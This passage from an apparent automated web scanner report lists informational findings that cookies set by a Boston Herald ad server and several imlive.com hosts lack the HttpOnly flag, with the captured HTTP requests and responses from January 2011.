The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.533. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.534. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...

11.535. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.536. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.537. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.538. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.539. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.540. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.541. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.542. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/track/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.20.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 61
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script type="text/javascript"></script>');

11.543. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2? HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1274
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Position1') {
document.write ('<a href="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/396181020/Positio
...[SNIP]...

11.544. http://pu.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=17b1032e-9627-4037-aed9-7b33fd1318f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.545. http://pu.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=e5a1a417-9342-4ec0-af0e-3d6d3157fbe9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
ppu=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:19 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h4cuqa554gznzp3el2rkfgii; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h4cuqa554gznzp3el2rkfgii; path=/; HttpOnly
Set-Cookie: spvdr=vd=e5a1a417-9342-4ec0-af0e-3d6d3157fbe9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: ppu=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:19 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.546. http://ru.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=5d548b95-834a-4b5b-a38b-38fb7d9bb957&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:20 GMT; path=/
iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.547. http://ru.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=3a4b35fa-5d1a-45be-94c9-e53f5978530e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pru=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:21 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
